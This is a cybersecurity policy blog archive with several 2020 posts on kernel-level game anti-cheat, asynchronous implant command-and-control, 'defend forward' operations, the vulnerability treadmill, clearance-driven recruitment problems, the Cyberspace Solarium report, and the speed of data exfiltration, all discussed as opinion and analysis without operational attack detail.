Thursday, May 21, 2020

Chinese Games have Ring0 on Everything

Like many of you, my kids love Doom Eternal, Valorant, Overwatch, Fortnite, Plants Vs Zombies, Team Fortress 2,  and many other video games that involve some shooting stuff but mostly calling each other names over the internet. I, on the other hand, often play a game called "Zoom calls where people try to explain what IS and IS NOT critical infrastructure". 

Back in the day (two decades ago) when Brandon Baker was at Microsoft writing Palladium, which then became the Next Generation Trusted Computing Base, I had a lot of questions, and the easiest way to answer those questions was "How would you create a GnuPG binary that could run on an untrusted kernel, which could still encrypt files without the kernel being able to get the keys?" You end up with memory fencing and a chain of trust that comes from Dell and signing and sealing and trusted peripherals and all that good stuff. 

The other thing people penciled out was "Remote Attestation" which essentially was "How do you play Quake 2 online and prove to the SERVER that you're not cheating." In this sense, Trusted Computing is not so much Trusted BY the User, but Trusted AGAINST the User. 

Doom Eternal removed their Ring0 anti-cheat but it's not that competitive a game really, especially compared to Valorant or Plants vs. Zombies

Because writing game cheats is somehow (in this dystopia) extremely lucrative (see this Immunity presentation on it),  game developers have quite logically invested in a budget implementation of Remote Attestation, largely by including mandatory kernel drivers which get installed alongside your game. These kernel drivers sometimes load bytecode from the internet, are encrypted and obfuscated, and have a wide view of what is running on your system - one you as the gamer or security analyst can not interpret any more than you can what scripts are run by your AV.

To add to your paranoia, as you probably DON'T know, most gaming companies are owned or controlled by Tencent, a Chinese conglomerate which is also very active in cyber security, so to speak, even though they are often headquartered in the US. 

To put it directly, nobody wants to say that Tencent can control nearly every machine in the world via obfuscated bytecode that runs directly in the kernel, but it's not a whole lot of steps between here and there. Of course, aside from direct manipulation gaming data, which includes lots of PII, offers a massive value to any SIGINT organization, has huge implications for running COVCOM networks (c.f. the plot of Homeland), and is generally a high value target simply because it is assumed to be such a low value target. 

We spend so much of our time trying to define critical infrastructure, but one easy way is to think about your network posture from an attacker's perspective, which hopefully this blogpost did without raising your quarantine-shredded anxiety levels too much. 




Tuesday, May 19, 2020

Asynchronous Command And Control and Why You Care If You Do Cyber Policy

Imagine you were a bipedal alien scientist studying creatures on Earth and you had never seen any before. Like that 50 First Dates movie with Adam Sandler, but instead of fart jokes from a walrus, science. Almost certainly as you examine things with your ultra-sophisticated tools, you are going to become obsessed with cause and effect or command and control. You're going to map every system and say which parts influence other parts. 

In other words, for humans, actions descend from centralized control, carried by a nervous system, with a rationalization of purpose. Even the stupid mitochondria is mislabeled as the "powerhouse of the cell". But this is sadly not how most systems really work! And so when you, the alien scientist, come across an ant colony or a siphonophore or certain species of shrimp and you're literally left reassessing the very meaning of cognition, it's hard not to want to just pretend it doesn't exist.

a picture of some eusocial organisms
Basically everything they taught you in school about Eusocial organisms was confused because the subject is naturally confusing. 


It is basically like this in all cyber policy when it comes to how implants and command and control work, and this filters into a lot of the policy frameworks you see built out of various places, such as the Tallinn Manual, export control frameworks, the unfortunately named "PrEP" framework, etc.  

Obviously there are a lot of hard definitional questions when it comes to cyber policy:
  • What is an exploit?
  • What is a vulnerability?
  • What is known vs unknown, and the meaning of the word 0day?
  • What is the location of a cyber operation?
  • What is sovereignty and when is it being compromised?
One of the hardest problems is that because remote access can be used for both espionage and for effect (D4), and of course also for defensive telemetry, the delimiters for policy control tend to lie outside of view.

So aside from admiring the problem I wanted to point at a whole new set of problems to admire that we have so far left in a blindspot - worms, emergent behavior, and asynchronous operations. These are the realistic mechanisms which correspond to two major defensive innovations:
  1. Air gaps and air-gap-like network structures (and this includes modern API-driven zero-trust architectures)
  2. Automated network-speed defenses (Microsoft ATP, for example)
technically everything is a circle if you zoom out far enough, but obviously Tempest exists and hardware implants exist and supply chain chicanery exists

Part of the problem is the lack of operational examples of decentralized control structures in cyber implants, but I will list the ones we know about here. Although it's worth noting that propagation via USB and control via USB are not the same thing. Three of these were just announced this week! But there are literally only five publicly known as far as I can tell.
  1. 2010 - FLAME (see this amazing Bitdefender article)
  2. 2020 - USB Thief (c.f. ESET here)
  3. 2014 - USB Ferry (Chinese APT c.f. Trend Micro here)
  4. 2017 - RAMSAY (DarkHotel c.f. ESET here)
  5. 2020 - COMpfun (c.f. Kaspersky here, although the section on the USB C2 is slim)
For why it is harder to model a system built by passing occasional messages and even more rarely receiving a response to those messages, it's useful to read James Micken's essentially perfect paper on the subject here. Implants that take commands from, say, a website are essentially interactive. This is the flavor that Metasploit and CANVAS and CORE Impact model - a simple connected lifestyle of cause and effect. You input a command, you get the result. If you don't get a result, that means perhaps your command has not ended, or your implant has crashed. Those are the two possibilities. 

But in an asynchronous model, your implant is making a lot of its own decisions! It's thinking "Hey, maybe I don't want to do that job yet, because nobody is on this computer right now so spinning up the CPU and getting really active will light a lot of bells on the endpoint protection system".  Or maybe your command did not get there. Or maybe the response did not get back. Or maybe something got corrupted and a gate to complexity hell opened up. Everything is possible. And hence, the behavior of the overall system, like an enraged ants nest, becomes complex and depends on a million factors out of your control.

In other words, I like to add to the list of questions above which haunt us: 
  • What is control, without control?
  




 

 

Monday, April 27, 2020

Defending Forward, aka, hacking the hackers

So the Cyberspace Solarium articles [1] and many other pieces talking about "Defending Forward" have been quite confusing, and I wanted to draw upon a few decades of history to put this strategy in context. In summary, however, defending forward is a complex and expensive tactic that has a perhaps outsized space in our national strategy, especially as espoused by the Cyberspace Solarium.

The traditional graphic to show effort to replace pieces of hacker kit although obviously at the top is "people". :)

Part of the expense is that hackers are constantly rebuilding their tool chains. Burning their rootkits or trojans or exploits or C2s or targets has two effects: They switch to their backups or spend a few months doing a rewrite and then move on. Of course, when they rewrite their tools, they are going to do a BETTER job than before, and this means your tracking effort is going to get harder over time.

It's a bit like attacking a footlock in BJJ - you put your own sources and methods at risk by revealing what you know and what you don't know as this graphic clearly illustrates by showing someone's cell phone selfie and a black space for someone else.


Indictments, a crucial part of the US defend forward and national pressure effort, seeks to be even more longterm, by blowing an actual individual or group's cover. One obvious thing this has done (since it has not resulting in convictions or the cessation of Chinese hacking efforts) is lock the people we indict into their government system, instead of allowing them to migrate into defensive jobs in industry, which is probably not in our best interest. Alisa Esage, while not indicted, was sanctioned as part of a US effort and cannot give speeches in Europe because of this. Did this help us? Of course the smart thing for us to do is include our HUMINT sources in our indictments to provide cover for them. Apparently this has already happened, and I am late on the update as always.

A more extreme example of defend forward in cyber is, of course, the Israeli campaign in Iran, assassinating people involved in their cyber efforts.

Layers of Vulnerability in Cyber Campaigns

I'm going to rank these from easiest to hardest, but it is also walking backwards on the kill chain, if that's your thing.

There are of course multiple ways to skin the onion that is a cyber campaign. You can hack the targets of that campaign, and from those steal the toolkit used. This is a non-inconsequential purpose of some pieces of kit we already know about (sigs.py).

You can also hack (or collect) the C2 and launch servers used by hacker groups, as appears to have been done against many of the Chinese crews, some of which decided to use Facebook and other social networks from their exploitation boxes, blowing their attribution instantly.

You can also hit the analysis arms of various APT groups (i.e. with trojaned Office documents or directly if you can figure out who they are via HUMINT/SIGINT). This is the most long-term effect you can have against your adversaries.

You can also hack the hackers themselves, which is where historically things have happened amongst hacker groups. There's a rich history here that no cyber strategist should be unfamiliar with because it's the most important analogy to what Defend Forward is trying to do. Let's list some examples:

  • Mitnick Era - You can read about these exciting stories in all sorts of books, but they predate modern life so I don't recommend using them for basing cyber strategy on.
  • EL8/PHC/ZF0/#ANTISEC - I'm not trying to imply these are all the same, but they are a modern history everyone in cyber policy should know. 
  • Lulzsec - The public story is that they were eventually rounded up by law enforcement. The private rumors is that they were a victim of an OCO.
  • HackingTeam/GammaGroup - Phineous Fisher is still an unknown hacktivist force wandering around making offers for people to release databases. Lots of people drunkenly claim at conference parties to be him/her though, which is traditional in the hacker world. 
  • Dutch vs Russians - A classic example of modern defend forward from a partner state
  • Israel vs Kaspersky/GRU - I only believe about 10% of the NYT reporting on cyber, since it's usually super off-base but it's worth a read.
  • ShadowBrokers - We don't know the details of how this was done, but that was an opdisk, not stolen from C2 so belongs here as the primary example of how to do denial of national-grade capabilities correctly.


Even with this limited set of examples, it is possible to start putting together some context for how the defend forward strategy matches our capabilities and investment. Much of the public discussion of defend forward talks about escalatory ladders, but I'd like to frame a few questions here that I find more useful for analysis.


  1. Are we deterring adversary action, or simply shaping it to be more covert and have greater long-term impact?
  2. Is our activity cost effective and low on side-effects?

One thing I think people don't recognize about some of the efforts on the above list is they involve a different type of hacking team than most military or government organizations use today. In particular, 90's hacker groups (c.f. Phineous Fisher) often wrote bespoke tool chains, exploits, implants, C2, and everything, for each target. It was, in modern parlance, a vertically integrated supply chain. It epitomizes the opposite of scale and was highly targeted. 


The USG has the opposite issue - a thousand potential adversaries, but with the advantages of existing HUMINT and SIGINT infrastructure. The other major difference, of course, being the goal of many of these attacks. Once most attacks happened in the list above, the result was a mailspool drop, and in many cases, along with a full chain of the attack, which adds valuable credibility, and is a tool the USG has not yet used.

The "Forward" part of "Defend Forward" is hard enough. The other major issue is finding a way to cause an impact on your adversaries longer than a hummingbird's cough. The easiest metric for whether or not your cyber security strategy is a good one is does it give my adversary more difficult equity issues than I have. The downside of releasing what you know about a target's malware is that they can trace their OPSEC compromises, potentially finding YOUR malware. The upside is that larger corporations, American and otherwise, who have automated threat feeds that include your IoC information may detect and remove the adversary's access. 

On the other hand, they may not.

Friday, April 10, 2020

Informing cyber policy from the vulnerability treadmill

This is a non-trivial part of being in offense or high level defense.


I recently wrote on the technical mailing list DD about the vulnerability treadmill, which essentially is the huge workload taken upon every technical person in the industry to keep up with vast amount of exploit information that is released daily. This firehose of information is distinct from the databases set up by various agencies which are used as lexicons (CVD/CVE/etc.) so various products can in theory talk together over XML pipes.

When talking to policy groups I like to compare any offensive researcher's lifestyle as one where they spend a few hours a day reading every patent that comes out in any particular field. I do this because you often see news articles about how China has exceeded US patents in some area or another based on patent application counts.

But CONTENT IS A LEADING INDICATOR. If any five random Chinese patents are ten times as interesting for a professional to read than any five US patents, then you know what's up without having to do the math on who has more. It is this way with vulnerabilities as well.

One of the things that is distressing to technical experts in this area is the policy focus on "patching". Patching is not nearly as important as people (in particular, as the Cyberspace Solarium's software liability section) make it sound. If you look at two recent vulnerabilities, the Citrix Netscaler and the recent Symantec Web Gateway vulnerability, you don't see "patchable" vulns.

The first thing to see about the Symantec Web Gateway exploit (here) is that it only exists if an upload directory has been created on the device. I'm not sure how common that is. The other thing to note is that the thing appears to be written in PHP, and contain a million other bugs, so I don't really care if this particular bug is realistic or not. It's basically impossible to write secure software in PHP or Perl, which are languages which exist only to prove how hard it can be to write secure software in them.


The Citrix Netscaler exploit sends as similar message of "Your purchasing department failed and no patch is available for that kind of governance mistake".

"The bug here is ... someone installed PERL and decided to use it on their VPN"

This kind of vulnerability does not exist on equipment when your purchasing department has done their job of due diligence. You don't patch that kind of issue - you rip the equipment out and fire your purchasing manager.

And in fact, banks regularly do this! Josh Corman had a panel on software liability where he discussed a scenario where banks take all the risk and software vendors take none. But this is not true! Banks are extremely tough customers and the majority of Immunity's business for a long time was reviewing the code of various things banks wanted to purchase, BEFORE THEY PURCHASED IT. If we found vulnerabilities that indicated poor code quality, or if the vendor didn't have a process to handle the vulnerabilities we found, they simply didn't buy it.

But what does this bring to a policy discussion? Here are three things you can know from staying on that treadmill:

  1. Patching is often just a quality signal - it often can't be used as a metric for a lot of very complex reasons
  2. The Chinese are actually better at cyber than we are right now. We are the "near peer" in cyberspace. I've read all their public exploits and...that's the state of the art. Thinking otherwise is egotism.
  3. Any norms process is going to have to include a much broader group of countries than just the top three. The Scandanavian countries, South Korea, Japan, and a huge host of "secondary cyber powers" are all far past the point of no return when it comes to capabilities. It is as if we are starting the nuclear norms conversation, but you have to take everyone's views into account including Uzbekistan and GreenPeace. This may color your projections on how realistic these norms discussions are. 





Tuesday, March 24, 2020

Recruit, Retain, Reject?


I want to talk about my experience working for the Federal Government, but also look at some wrinkles in the Cyberspace Solarium's efforts to address recruitment and retainment. At some level, every government proposal to address this problem is a twelve-dimensional remastering of Groundhog Day. You can see this in the supporting document on Lawfareblog, which focuses on the military talent shortage, possibly inspired by a meeting with CyberCom?

Most reports of this nature nibble around the edges of the problem and the Lawfareblog article proposes the following:

  • Relaxing military grooming and fitness standards for people in IT roles
  • Paying IT people more to compete with private industry
  • Opening offices in cities that people want to work in (or say, in Silicon Valley, where nobody WANTS to work but apparently people end up)
  • Building a skills database (which ironically would probably get hacked)
  • Offering unique perks (like training on emerging technologies, or one-of-a-kind challenge coins!)
All of the typical suggested measures largely ignore the the number one issue with recruitment and retainment which is the clearance system. In this day and age, not being able to offer a clearance within a week is insane. In many ways, we need to completely rethink the clearance system, which right now is a one way door - people are required to be working in the Government or for a Government contractor to hold a clearance, and when they lose it, they rarely get it back as it requires a full-on reprocessing, which can take years.

That brings me to my story. I filed for some scholarships in high school, one with NASA and one with the NSA. My high school grades were not great, but the NSA application included an interview and I was even then, as obviously geeky as it got. I had, as it were, mad Turbo Pascal skills, and some beginner assembly language, and the NSA had a voracious appetite for minority students in technical fields like computer science, which I already knew was my focus to the total exclusion of anything else, like social skills or any fashion sense. 


At the time the program was called the Undergraduate Training Program and started in 1986 (legend has it a member of the Congressional Black Caucus got a tour of the NSA and didn't see any minorities and threatened to yank funding until he did), but it appears to have been renamed the Stokes Educational Scholarship. I highly recommend it, if you are a high school student reading this blog, or happen to have one near you! 

But also, I think the UTP/Stokes program has offered massive strategic advantages to the United States, getting students into the NSA who otherwise never would have considered it, who have gone on to contribute immeasurably to our national security. It has had high return on investment, in other words. So please don't take this blogpost as saying these efforts are not worth it. However, they will not change the game or solve the problem.

One reason for that is that these programs exist and have for forty years. So what are the new proposals in the Cyberspace Solarium efforts? 


Not that we can't "Do more" but aside from the "institutional barrier" of clearances, it's hard to see what we can drastically change to open a huge pipeline of new applicants for the 33K billets we need to fill. 

Ask yourself this:
  • Why does it take 2 years to get a TS-SCI?
  • Why do you lose your clearance after five years of not using it?
  • Why can't a small company hold a facilities clearance? Why do companies hold your clearance, and not the government itself?  
  • Do we know anyone who has given up their clearance, gone on to have a successful private industry career that involved extensive travel, and then re-applied and been accepted? If not , why not?
  • Why have we not already copied and expanded the massively successful NCSC Industry-100 program?

To be fair, the report acknowledges this pain point by asking for a new report!

We don't need another report - we need a massive change to an obviously broken system.


If you've been following DARPA's work in the area, you may have noticed they've already done research on getting people a clearance in a week - we just need the political wherewithal to follow through on implementing it. 

It may be, of course, that even with the clearance roadblock removed, the Culture roadblock, as identified by the authors of the Solarium report, would remain. Culture is not about haircuts and fitness levels - and in fact most hackers I know are very into Brazilian Jiu Jitsu and can run a reasonably fast mile.

Culture is about a deeper set of problems, none of which are in the cyber domain: 
  • Politicization of the Mission, including the ICE mission
  • The Drug War
  • "Stop and Frisk"
  • "Why are we still in Afghanistan?"
If exposure to Stop and Frisk already pre-tuned you to thinking that law enforcement was an unacceptable career path, you're not going to apply to fix IT security issues at the FBI.  CISA's mission may be amazing, but you can't retain workers who have their friends getting detained by ICE in front of their kids. You can't have the AG writing polemics against End to End encryption and then try to recruit people out of Facebook into DoJ because they already know the head boss is full of it.

Sometimes you can't solve your recruitment problem by throwing money at the problem, or more scholarships, or reaching out to more people. A better solution would include an agency that is removed from these complications - entirely out of the executive structure, with a mission that attracted the best and brightest because they believed it was uncorrupted. We can still call it CISA!

But until we solve the personnel problem, we can't solve the other problems the Solarium report tries to address. And until we address the Culture and Clearance problems, we can't even begin.



--------

A quick note from someone...


Another note:




Thursday, March 12, 2020

The Solarium Review - What Sticks Out

Most comprehensive reviews of government policy have little-to-no impact, because they involve complex unpopular legislation, or implementation by an unwilling executive branch, or more often, both.

That's why it's understandable that the members of the Solarium have embarked on a marketing tour, doing podcast after podcast and panel after panel to sell not just the ideas in their paper, but the idea that these things have a hope of getting implemented. It may even be true! To that end, it's good to look at many of the ideas with a critical eye, and in depth.

Some things immediately stand out:

  • Six paragraphs of absolute cowardice on the End-2-End encryption issue
  • The document portends a heavy lift and massive investment in CISA which is under DHS
  • So so so much about norms - which in certain circles is like going to a scientific convention and talking about astrology 
  • The section on adding liability to software vendors (4.2) is a difficult task, to say the least.

Each of these items requires a massive paper to analyze. The lack of a stance on E2E encryption while at the same time throughout the document giving the standard polemic on public private-partnership evidences that the Commission was not of the view that the overall technical community needed to be wooed - that you can on one hand go to war with the community on major issues key to their worldview, and on the other hand recruit, retain, and partner with them. This is not how the world works. They missed a once-in-a-decade opportunity. 

For CISA - which is under DHS - there are two major issues: 
  • Can CISA handle the lift? Can they scale up and do all the things recommended in the report? Being able to hire and manage that many contractors alone is difficult. We have to assume everything this document asks is going to be done under someone else other than Chris Krebs...
  • Will industry ignore that they sit next to the EXTREMELY UNPOPULAR immigration arm of DHS, which has tainted DHS's whole image to an almost unrecoverable extent.

The software liability issue is complex but any detailed look at it can talk about how weird many of the ideas on this section are.  As Perri would say "There are too many issues in this section to list." Although, to be fair, a future blogpost will do so.


Tuesday, February 11, 2020

The Transmission Curve

Imagine everything your company does, but in terms of a RAR file. Every document, and email, and VOIP-call, and Teams message, every password and LDAP entry, every piece of source code in the git repo, and webex, and document scan, and database of PII, and Salesforce spreadsheet. Everything, no matter how trivial, related to the running of your company. If you're a five hundred person company, let's say that you generate about a Petabyte worth of information per year. This is dominated by useless webex video conference calls, which a hacker could not care less about. A more realistic total cost of ownership (TC0), in terms of bytes, for a five hundred person company for one decade, is 35 Terabytes (I backed this up with some real-world information and some calculations which I can share as needed - this includes all emails, documents, source code, and phone calls, but no video).

That is currently just over a month of downloading for our hacker friends - but we will be nice and say they only download data at night (aka, 1/3 the time). Also, a month is a very long time to be "on target" but download size is basically static over the years and the time is pressured down by increasing network speeds. If you are in the ever growing box-of-pain (see below) then every time you get hacked, your entire company's IP value walks out the door.

Everything in this graph is either my estimate or Crowdstrike's but just understand that as speeds go up, and corporate IP size remains static, the odds of any hacked company being completely downloaded before you catch the pesky hacker goes to 1.

Hackers or signals intelligence agencies deal with this question every day in a different form, because 99% of what you see on most networks is useless porn and Windows updates. You want to filter that out on-site and then only send back the good stuff. But as network speeds go up, and storage costs go down, it's often easier to download everything and sort through it later. This is of course similar to the problem a certain large SIGINT group reportedly had.

Following this curve is why I think the Endpoint Security people's 1/10/60 minute rule is ridiculous, and why humans in the loop for security response are also hilarious. Ask yourself, at what speed of network does your company enter the box of pain before 60 minutes is up?